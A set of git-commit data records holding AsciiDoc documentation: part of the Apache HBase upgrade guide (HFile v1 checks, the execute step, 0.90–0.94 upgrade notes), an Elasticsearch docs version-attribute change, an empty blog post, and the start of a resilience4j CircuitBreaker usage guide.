Files:\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/fa02dac1f38d03577bd0f7e666f12812\/family\/1\nCount of Regions with HFileV1: 2\nRegions to Major Compact:\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/fa02dac1f38d03577bd0f7e666f12812\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/ecdd3eaee2d2fcf8184ac025555bb2af\n\nThere are some HFileV1, or corrupt files (files with incorrect major version)\n----\n\nIn the above sample output, there are two HFile v1 files in two regions, and one corrupt file. Corrupt files should probably be removed. The regions that have HFile v1s need to be major compacted. To major compact, start up the hbase shell and review how to compact an individual region. After the major compaction is done, rerun the check step and the HFile v1 files should be gone, replaced by HFile v2 instances.\n\nBy default, the check step scans the HBase root directory (defined as `hbase.rootdir` in the configuration). To scan a specific directory only, pass the `-dir` option.\n[source,bash]\n----\n$ bin\/hbase upgrade -check -dir \/myHBase\/testTable\n----\nThe above command would detect HFile v1 files in the _\/myHBase\/testTable_ directory.\n\nOnce the check step reports all the HFile v1 files have been rewritten, it is safe to proceed with the upgrade.\n\n.execute\nAfter the _check_ step shows the cluster is free of HFile v1, it is safe to proceed with the upgrade. Next is the _execute_ step. You must *SHUTDOWN YOUR 0.94.x CLUSTER* before you can run the execute step. The execute step will not run if it detects running HBase masters or RegionServers.\n\n[NOTE]\n====\nHDFS and ZooKeeper should be up and running during the upgrade process. If zookeeper is managed by HBase, then you can start zookeeper so it is available to the upgrade by running\n[source,bash]\n----\n$ .\/hbase\/bin\/hbase-daemon.sh start zookeeper\n----\n====\n\nThe execute upgrade step is made of three substeps.\n\n* Namespaces: HBase 0.96.0 has support for namespaces. The upgrade needs to reorder directories in the filesystem for namespaces to work.\n\n* ZNodes: All znodes are purged so that new ones can be written in their place using a new protobuf'ed format and a few are migrated in place: e.g. replication and table state znodes\n\n* WAL Log Splitting: If the 0.94.x cluster shutdown was not clean, we'll split WAL logs as part of migration before we startup on 0.96.0. 
This WAL splitting runs slower than the native distributed WAL splitting because it is all inside the single upgrade process (so try and get a clean shutdown of the 0.94.0 cluster if you can).\n\nTo run the _execute_ step, make sure that first you have copied HBase 0.96.0 binaries everywhere under servers and under clients. Make sure the 0.94.0 cluster is down. Then do as follows:\n[source,bash]\n----\n$ bin\/hbase upgrade -execute\n----\nHere is some sample output.\n\n----\nStarting Namespace upgrade\nCreated version file at hdfs:\/\/localhost:41020\/myHBase with version=7\nMigrating table testTable to hdfs:\/\/localhost:41020\/myHBase\/.data\/default\/testTable\n.....\nCreated version file at hdfs:\/\/localhost:41020\/myHBase with version=8\nSuccessfully completed NameSpace upgrade.\nStarting Znode upgrade\n.....\nSuccessfully completed Znode upgrade\n\nStarting Log splitting\n...\nSuccessfully completed Log splitting\n----\n\nIf the output from the execute step looks good, stop the zookeeper instance you started to do the upgrade:\n[source,bash]\n----\n$ .\/hbase\/bin\/hbase-daemon.sh stop zookeeper\n----\nNow start up hbase-0.96.0.\n\n[[s096.migration.troubleshooting]]\n=== Troubleshooting\n\n[[s096.migration.troubleshooting.old.client]]\n.Old Client connecting to 0.96 cluster\nIt will fail with an exception like the below. Upgrade.\n----\n17:22:15 Exception in thread \"main\" java.lang.IllegalArgumentException: Not a host:port pair: PBUF\n17:22:15 *\n17:22:15 api-compat-8.ent.cloudera.com \ufffd\ufffd \ufffd\ufffd\ufffd(\n17:22:15 at org.apache.hadoop.hbase.util.Addressing.parseHostname(Addressing.java:60)\n17:22:15 at org.apache.hadoop.hbase.ServerName.&init>(ServerName.java:101)\n17:22:15 at org.apache.hadoop.hbase.ServerName.parseVersionedServerName(ServerName.java:283)\n17:22:15 at org.apache.hadoop.hbase.MasterAddressTracker.bytesToServerName(MasterAddressTracker.java:77)\n17:22:15 at org.apache.hadoop.hbase.MasterAddressTracker.getMasterAddress(MasterAddressTracker.java:61)\n17:22:15 at org.apache.hadoop.hbase.client.HConnectionManager$HConnectionImplementation.getMaster(HConnectionManager.java:703)\n17:22:15 at org.apache.hadoop.hbase.client.HBaseAdmin.&init>(HBaseAdmin.java:126)\n17:22:15 at Client_4_3_0.setup(Client_4_3_0.java:716)\n17:22:15 at Client_4_3_0.main(Client_4_3_0.java:63)\n----\n\n==== Upgrading `META` to use Protocol Buffers (Protobuf)\n\nWhen you upgrade from versions prior to 0.96, `META` needs to be converted to use protocol buffers. This is controlled by the configuration option `hbase.MetaMigrationConvertingToPB`, which is set to `true` by default. Therefore, by default, no action is required on your part.\n\nThe migration is a one-time event. However, every time your cluster starts, `META` is scanned to ensure that it does not need to be converted. If you have a very large number of regions, this scan can take a long time. Starting in 0.98.5, you can set `hbase.MetaMigrationConvertingToPB` to `false` in _hbase-site.xml_, to disable this start-up scan. This should be considered an expert-level setting.\n\n[[upgrade0.94]]\n=== Upgrading from 0.92.x to 0.94.x\nWe used to think that 0.92 and 0.94 were interface compatible and that you can do a rolling upgrade between these versions but then we figured that link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-5357[HBASE-5357 Use builder pattern in HColumnDescriptor] changed method signatures so rather than return `void` they instead return `HColumnDescriptor`. 
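A sketch of the signature change, using `setMaxVersions` as an example (the exact shapes are inferred from the JIRA title and the error message below):\n[source,java]\n----\n\/\/ 0.92.x: setters on HColumnDescriptor return void\npublic void setMaxVersions(int maxVersions);\n\n\/\/ 0.94.x: setters return the descriptor itself, enabling a builder style\npublic HColumnDescriptor setMaxVersions(int maxVersions);\n----\nCode compiled against the old `void`-returning signature but run against 0.94.x jars cannot find the method it expects.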
This will throw`java.lang.NoSuchMethodError: org.apache.hadoop.hbase.HColumnDescriptor.setMaxVersions(I)V` so 0.92 and 0.94 are NOT compatible. You cannot do a rolling upgrade between them.\n\n[[upgrade0.92]]\n=== Upgrading from 0.90.x to 0.92.x\n==== Upgrade Guide\nYou will find that 0.92.0 runs a little differently to 0.90.x releases. Here are a few things to watch out for upgrading from 0.90.x to 0.92.0.\n\n.tl:dr\n[NOTE]\n====\nThese are the important things to know before upgrading.\n. Once you upgrade, you can\u2019t go back.\n\n. MSLAB is on by default. Watch that heap usage if you have a lot of regions.\n\n. Distributed Log Splitting is on by default. It should make RegionServer failover faster.\n\n. There\u2019s a separate tarball for security.\n\n. If `-XX:MaxDirectMemorySize` is set in your _hbase-env.sh_, it\u2019s going to enable the experimental off-heap cache (You may not want this).\n====\n\n.You can\u2019t go back!\nTo move to 0.92.0, all you need to do is shutdown your cluster, replace your HBase 0.90.x with HBase 0.92.0 binaries (be sure you clear out all 0.90.x instances) and restart (You cannot do a rolling restart from 0.90.x to 0.92.x -- you must restart). On startup, the `.META.` table content is rewritten removing the table schema from the `info:regioninfo` column. Also, any flushes done post first startup will write out data in the new 0.92.0 file format, <<hfilev2>>. This means you cannot go back to 0.90.x once you\u2019ve started HBase 0.92.0 over your HBase data directory.\n\n.MSLAB is ON by default\nIn 0.92.0, the `<<hbase.hregion.memstore.mslab.enabled,hbase.hregion.memstore.mslab.enabled>>` flag is set to `true` (See <<gcpause>>). In 0.90.x it was false. When it is enabled, memstores will step allocate memory in MSLAB 2MB chunks even if the memstore has zero or just a few small elements. This is fine usually but if you had lots of regions per RegionServer in a 0.90.x cluster (and MSLAB was off), you may find yourself OOME'ing on upgrade because the `thousands of regions * number of column families * 2MB MSLAB` (at a minimum) puts your heap over the top. Set `hbase.hregion.memstore.mslab.enabled` to `false` or set the MSLAB size down from 2MB by setting `hbase.hregion.memstore.mslab.chunksize` to something less.\n\n[[dls]]\n.Distributed Log Splitting is on by default\nPrevious, WAL logs on crash were split by the Master alone. In 0.92.0, log splitting is done by the cluster (See link:https:\/\/issues.apache.org\/jira\/browse\/hbase-1364[HBASE-1364 [performance\\] Distributed splitting of regionserver commit logs] or see the blog post link:http:\/\/blog.cloudera.com\/blog\/2012\/07\/hbase-log-splitting\/[Apache HBase Log Splitting]). This should cut down significantly on the amount of time it takes splitting logs and getting regions back online again.\n\n.Memory accounting is different now\nIn 0.92.0, <<hfilev2>> indices and bloom filters take up residence in the same LRU used caching blocks that come from the filesystem. In 0.90.x, the HFile v1 indices lived outside of the LRU so they took up space even if the index was on a \u2018cold\u2019 file, one that wasn\u2019t being actively used. With the indices now in the LRU, you may find you have less space for block caching. Adjust your block cache accordingly. See the <<block.cache>> for more detail. The block size default size has been changed in 0.92.0 from 0.2 (20 percent of heap) to 0.25.\n\n.On the Hadoop version to use\nRun 0.92.0 on Hadoop 1.0.x (or CDH3u3). 
The performance benefits are worth making the move. Otherwise, our Hadoop prescription is as it has been; you need an Hadoop that supports a working sync. See <<hadoop>>.\n\nIf running on Hadoop 1.0.x (or CDH3u3), enable local read. See link:http:\/\/files.meetup.com\/1350427\/hug_ebay_jdcryans.pdf[Practical Caching] presentation for ruminations on the performance benefits \u2018going local\u2019 (and for how to enable local reads).\n\n.HBase 0.92.0 ships with ZooKeeper 3.4.2\nIf you can, upgrade your ZooKeeper. If you can\u2019t, 3.4.2 clients should work against 3.3.X ensembles (HBase makes use of 3.4.2 API).\n\n.Online alter is off by default\nIn 0.92.0, we\u2019ve added an experimental online schema alter facility (See <<hbase.online.schema.update.enable,hbase.online.schema.update.enable>>). It's off by default. Enable it at your own risk. Online alter and splitting tables do not play well together so be sure your cluster quiescent using this feature (for now).\n\n.WebUI\nThe web UI has had a few additions made in 0.92.0. It now shows a list of the regions currently transitioning, recent compactions\/flushes, and a process list of running processes (usually empty if all is well and requests are being handled promptly). Other additions including requests by region, a debugging servlet dump, etc.\n\n.Security tarball\nWe now ship with two tarballs; secure and insecure HBase. Documentation on how to setup a secure HBase is on the way.\n\n.Changes in HBase replication\n0.92.0 adds two new features: multi-slave and multi-master replication. The way to enable this is the same as adding a new peer, so in order to have multi-master you would just run add_peer for each cluster that acts as a master to the other slave clusters. Collisions are handled at the timestamp level which may or may not be what you want, this needs to be evaluated on a per use case basis. Replication is still experimental in 0.92 and is disabled by default, run it at your own risk.\n\n.RegionServer now aborts if OOME\nIf an OOME, we now have the JVM kill -9 the RegionServer process so it goes down fast. Previous, a RegionServer might stick around after incurring an OOME limping along in some wounded state. To disable this facility, and recommend you leave it in place, you\u2019d need to edit the bin\/hbase file. Look for the addition of the -XX:OnOutOfMemoryError=\"kill -9 %p\" arguments (See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4769[HBASE-4769 - \u2018Abort RegionServer Immediately on OOME\u2019]).\n\n.HFile v2 and the \u201cBigger, Fewer\u201d Tendency\n0.92.0 stores data in a new format, <<hfilev2>>. As HBase runs, it will move all your data from HFile v1 to HFile v2 format. This auto-migration will run in the background as flushes and compactions run. HFile v2 allows HBase run with larger regions\/files. In fact, we encourage that all HBasers going forward tend toward Facebook axiom #1, run with larger, fewer regions. If you have lots of regions now -- more than 100s per host -- you should look into setting your region size up after you move to 0.92.0 (In 0.92.0, default size is now 1G, up from 256M), and then running online merge tool (See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-1621[HBASE-1621 merge tool should work on online cluster, but disabled table]).\n\n[[upgrade0.90]]\n=== Upgrading to HBase 0.90.x from 0.20.x or 0.89.x\nThis version of 0.90.x HBase can be started on data written by HBase 0.20.x or HBase 0.89.x. There is no need of a migration step. 
HBase 0.89.x and 0.90.x do write out the name of region directories differently -- they name them with an MD5 hash of the region name rather than a Jenkins hash -- so this means that once started, there is no going back to HBase 0.20.x.\n\nBe sure to remove the _hbase-default.xml_ from your _conf_ directory on upgrade. A 0.20.x version of this file will have sub-optimal configurations for 0.90.x HBase. The _hbase-default.xml_ file is now bundled into the HBase jar and read from there. If you would like to review the content of this file, see it in the src tree at _src\/main\/resources\/hbase-default.xml_ or see <<hbase_default_configurations>>.\n\nFinally, if upgrading from 0.20.x, check your .META. schema in the shell. In the past we would recommend that users run with a 16kb MEMSTORE_FLUSHSIZE. Run\n----\nhbase> scan '-ROOT-'\n----\nin the shell. This will output the current `.META.` schema. Check the `MEMSTORE_FLUSHSIZE` value. Is it 16kb (16384)? If so, you will need to change this (the 'normal'\/default value is 64MB (67108864)). Run the script `bin\/set_meta_memstore_size.rb`. This will make the necessary edit to your `.META.` schema. Failure to run this change will make for a slow cluster. See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-3499[HBASE-3499 Users upgrading to 0.90.0 need to have their .META. table updated with the right MEMSTORE_SIZE].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9df539988a722cbcf1038331a9cef06d9cb28c07","subject":"Fix master version in docs","message":"Fix master version in docs\n\nThe docs are versioned as 8.0.0-alpha1 yet we are not currently\npublishing 8.0.0-alpha1 snapshots, instead 8.0.0 snapshots. We will only\nlater qualify designated builds as 8.0.0-alpha1 at which point the docs\nversion can be updated to reflect that.
This commit updates the docs\nversions to 8.0.0.\n\nCloses #41941\n","repos":"robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/Versions.asciidoc","new_file":"docs\/Versions.asciidoc","new_contents":":version: 8.0.0\n\/\/\/\/\nbare_version never includes -alpha or -beta\n\/\/\/\/\n:bare_version: 8.0.0\n:major-version: 8.x\n:prev-major-version: 7.x\n:lucene_version: 8.1.0\n:lucene_version_path: 8_1_0\n:branch: master\n:jdk: 11.0.2\n:jdk_major: 11\n:build_flavor: default\n:build_type: tar\n\n\/\/\/\/\/\/\/\/\/\/\nrelease-state can be: released | prerelease | unreleased\n\/\/\/\/\/\/\/\/\/\/\n\n:release-state: unreleased\n\n:issue: https:\/\/github.com\/elastic\/elasticsearch\/issues\/\n:ml-issue: https:\/\/github.com\/elastic\/ml-cpp\/issues\/\n:pull: https:\/\/github.com\/elastic\/elasticsearch\/pull\/\n:ml-pull: https:\/\/github.com\/elastic\/ml-cpp\/pull\/\n:docker-repo: docker.elastic.co\/elasticsearch\/elasticsearch\n:docker-image: {docker-repo}:{version}\n:plugin_url: https:\/\/artifacts.elastic.co\/downloads\/elasticsearch-plugins\n\n\/\/\/\/\/\/\/\nJavadoc roots used to generate links from Painless's API reference\n\/\/\/\/\/\/\/\n:java11-javadoc: https:\/\/docs.oracle.com\/en\/java\/javase\/11\/docs\/api\n:joda-time-javadoc: http:\/\/www.joda.org\/joda-time\/apidocs\n:lucene-core-javadoc: http:\/\/lucene.apache.org\/core\/{lucene_version_path}\/core\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n:elasticsearch-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/elasticsearch\/{version}-SNAPSHOT\n:transport-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/transport\/{version}-SNAPSHOT\n:rest-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client\/{version}-SNAPSHOT\n:rest-client-sniffer-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client-sniffer\/{version}-SNAPSHOT\n:rest-high-level-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-high-level-client\/{version}-SNAPSHOT\n:painless-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/painless\/lang-painless\/{version}-SNAPSHOT\n:parent-join-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/parent-join-client\/{version}-SNAPSHOT\n:percolator-client-javadoc: 
https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/percolator-client\/{version}-SNAPSHOT\n:matrixstats-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/aggs-matrix-stats-client\/{version}-SNAPSHOT\n:rank-eval-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/rank-eval-client\/{version}-SNAPSHOT\n:version_qualified: {bare_version}-SNAPSHOT\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n:elasticsearch-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/elasticsearch\/{version}\n:transport-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/transport\/{version}\n:rest-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client\/{version}\n:rest-client-sniffer-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client-sniffer\/{version}\n:rest-high-level-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-high-level-client\/{version}\n:painless-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/painless\/lang-painless\/{version}\n:parent-join-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/parent-join-client\/{version}\n:percolator-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/percolator-client\/{version}\n:matrixstats-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/aggs-matrix-stats-client\/{version}\n:rank-eval-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/rank-eval-client\/{version}\n:version_qualified: {bare_version}\nendif::[]\n\n:javadoc-client: {rest-high-level-client-javadoc}\/org\/elasticsearch\/client\n:javadoc-xpack: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\n:javadoc-license: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\/license\n:javadoc-watcher: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\/watcher\n\n\/\/\/\/\/\/\/\nShared attribute values are pulled from elastic\/docs\n\/\/\/\/\/\/\/\n\ninclude::{asciidoc-dir}\/..\/..\/shared\/attributes.asciidoc[]\n","old_contents":":version: 8.0.0-alpha1\n\/\/\/\/\nbare_version never includes -alpha or -beta\n\/\/\/\/\n:bare_version: 8.0.0\n:major-version: 8.x\n:prev-major-version: 7.x\n:lucene_version: 8.1.0\n:lucene_version_path: 8_1_0\n:branch: master\n:jdk: 11.0.2\n:jdk_major: 11\n:build_flavor: default\n:build_type: tar\n\n\/\/\/\/\/\/\/\/\/\/\nrelease-state can be: released | prerelease | unreleased\n\/\/\/\/\/\/\/\/\/\/\n\n:release-state: unreleased\n\n:issue: https:\/\/github.com\/elastic\/elasticsearch\/issues\/\n:ml-issue: https:\/\/github.com\/elastic\/ml-cpp\/issues\/\n:pull: https:\/\/github.com\/elastic\/elasticsearch\/pull\/\n:ml-pull: https:\/\/github.com\/elastic\/ml-cpp\/pull\/\n:docker-repo: docker.elastic.co\/elasticsearch\/elasticsearch\n:docker-image: {docker-repo}:{version}\n:plugin_url: https:\/\/artifacts.elastic.co\/downloads\/elasticsearch-plugins\n\n\/\/\/\/\/\/\/\nJavadoc roots used to generate links from Painless's API reference\n\/\/\/\/\/\/\/\n:java11-javadoc: https:\/\/docs.oracle.com\/en\/java\/javase\/11\/docs\/api\n:joda-time-javadoc: http:\/\/www.joda.org\/joda-time\/apidocs\n:lucene-core-javadoc: 
http:\/\/lucene.apache.org\/core\/{lucene_version_path}\/core\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n:elasticsearch-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/elasticsearch\/{version}-SNAPSHOT\n:transport-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/transport\/{version}-SNAPSHOT\n:rest-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client\/{version}-SNAPSHOT\n:rest-client-sniffer-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client-sniffer\/{version}-SNAPSHOT\n:rest-high-level-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-high-level-client\/{version}-SNAPSHOT\n:painless-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/painless\/lang-painless\/{version}-SNAPSHOT\n:parent-join-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/parent-join-client\/{version}-SNAPSHOT\n:percolator-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/percolator-client\/{version}-SNAPSHOT\n:matrixstats-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/aggs-matrix-stats-client\/{version}-SNAPSHOT\n:rank-eval-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/rank-eval-client\/{version}-SNAPSHOT\n:version_qualified: {bare_version}-SNAPSHOT\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n:elasticsearch-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/elasticsearch\/{version}\n:transport-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/transport\/{version}\n:rest-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client\/{version}\n:rest-client-sniffer-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client-sniffer\/{version}\n:rest-high-level-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-high-level-client\/{version}\n:painless-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/painless\/lang-painless\/{version}\n:parent-join-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/parent-join-client\/{version}\n:percolator-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/percolator-client\/{version}\n:matrixstats-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/aggs-matrix-stats-client\/{version}\n:rank-eval-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/rank-eval-client\/{version}\n:version_qualified: {bare_version}\nendif::[]\n\n:javadoc-client: {rest-high-level-client-javadoc}\/org\/elasticsearch\/client\n:javadoc-xpack: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\n:javadoc-license: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\/license\n:javadoc-watcher: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\/watcher\n\n\/\/\/\/\/\/\/\nShared attribute values are pulled from elastic\/docs\n\/\/\/\/\/\/\/\n\ninclude::{asciidoc-dir}\/..\/..\/shared\/attributes.asciidoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"5e39d14f030c3f4a0bff82edf8150010fff618ab","subject":"y2b create post The iPhone Nexus Super Combo","message":"y2b create post The iPhone Nexus Super Combo","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-31-The-iPhone-Nexus-Super-Combo.adoc","new_file":"_posts\/2014-07-31-The-iPhone-Nexus-Super-Combo.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"6fe398776b474b1adb7605597fcb96483825a78a","subject":"Updated documentation","message":"Updated documentation\n","repos":"goldobin\/resilience4j,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,mehtabsinghmann\/resilience4j","old_file":"src\/docs\/asciidoc\/usage_guide.adoc","new_file":"src\/docs\/asciidoc\/usage_guide.adoc","new_contents":"== Usage Guide\n\n=== Configure the CircuitBreaker\n\nThis library comes with an `InMemoryCircuitBreakerRegistry` based on a `ConcurrentMap` which provides thread safety and atomicity guarantees. You must use the CircuitBreakerRegistry to manage (create and retrieve) your CircuitBreakers. You can create a `InMemoryCircuitBreakerRegistry` with a default global `CircuitBreakerConfig` for all of your CircuitBreakers as follows.\n\n[source,java]\n----\n\/\/ Create a InMemoryCircuitBreakerRegistry with a default global configuration\n\/\/ (maxFailures = 3, waitInterval = 60[s], ignoredExceptions = empty)\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\n----\n\nAs an alternative you can provide your own custom global `CircuitBreakerConfig`. In order to create a custom global CircuitBreakerConfig or a CircuitBreakerConfig for a specific CircuitBreaker, you can use the CircuitBreakerConfig builder. You can configure the maximum number of allowed failures and the wait interval [ms], which specifies how long the CircuitBreaker should stay in state `OPEN`.\n\n[source,java]\n----\n\/\/ Create a custom configuration for a CircuitBreaker\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .maxFailures(1)\n .waitInterval(1000)\n .build();\n\n\/\/ Create a InMemoryCircuitBreakerRegistry with a custom global configuration\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.of(circuitBreakerConfig);\n\n\/\/ Get a CircuitBreaker from the CircuitBreakerRegistry with the global default configuration\nCircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker(\"otherName\");\n\n\/\/ Get a CircuitBreaker from the CircuitBreakerRegistry with a custom configuration\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\", circuitBreakerConfig);\n----\n\n=== Functional programming example\n\nYou can decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction` function with `CircuitBreaker.decorateCheckedSupplier()`, `CircuitBreaker.decorateCheckedRunnable()` or `CircuitBreaker.decorateCheckedFunction()`. You can invoke the returned function with `Try.of()` or `Try.run()` from https:\/\/github.com\/javaslang\/javaslang[javaslang]. This allows to chain further functions with `map`, `flatMap`, `filter`, `recover` or `andThen`. 
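For example, a side-effecting call that returns no value can be guarded in the same way with `Try.run()` (a minimal sketch, assuming the runnable decorator mirrors the supplier variant; `doSomething` is a placeholder):\n[source,java]\n----\n\/\/ Decorate a runnable; when the CircuitBreaker is OPEN the call is short-circuited\nTry.CheckedRunnable decoratedRunnable = CircuitBreaker\n    .decorateCheckedRunnable(() -> doSomething(), circuitBreaker);\nTry<Void> result = Try.run(decoratedRunnable);\n----\nThe resulting `Try<Void>` can be chained with `recover` or `andThen` just like a supplier result.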
The chained functions are only invoked, if the CircuitBreaker is CLOSED or HALF_CLOSED.\nIn the following example, `Try.of()` returns a `Success<String>` Monad, if the invocation of the function is successful. If the function throws an exception, a `Failure<Throwable>` Monad is returned and `map` is not invoked.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\n\n\/\/ When\nTry.CheckedSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateCheckedSupplier(() -> \"This can be any method which returns: 'Hello\", circuitBreaker);\n\n\/\/ You can chain other functions with `map` and `flatMap`.\n\/\/ The `Try` Monad returns a `Success<String>`, if all functions run successfully.\nTry<String> result = Try.of(decoratedSupplier)\n .map(value -> value + \" world'\");\n\n\/\/ Then\nassertThat(result.isSuccess()).isTrue();\nassertThat(result.get()).isEqualTo(\"This can be any method which returns: 'Hello world'\");\n----\n\nYou could also chain up functions which are decorated by different CircuitBreakers.\n\n[source,java]\n----\n\/\/Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\nCircuitBreaker anotherCircuitBreaker = circuitBreakerRegistry.circuitBreaker(\"anotherTestName\");\n\n\/\/ When I create a Supplier and a Function which are decorated by different CircuitBreakers\nTry.CheckedSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateCheckedSupplier(() -> \"Hello\", circuitBreaker);\n\nTry.CheckedFunction<String, String> decoratedFunction = CircuitBreaker\n .decorateCheckedFunction((input) -> input + \" world\", anotherCircuitBreaker);\n\n\/\/ and I chain a function with `map`.\nTry<String> result = Try.of(decoratedSupplier)\n .map(decoratedFunction);\n\n\/\/ Then\nassertThat(result.get()).isEqualTo(\"Hello world\");\n----\n\n=== OPEN CircuitBreaker example\n\nIn this test case `map` is not invoked, because the CircuitBreaker is OPEN. 
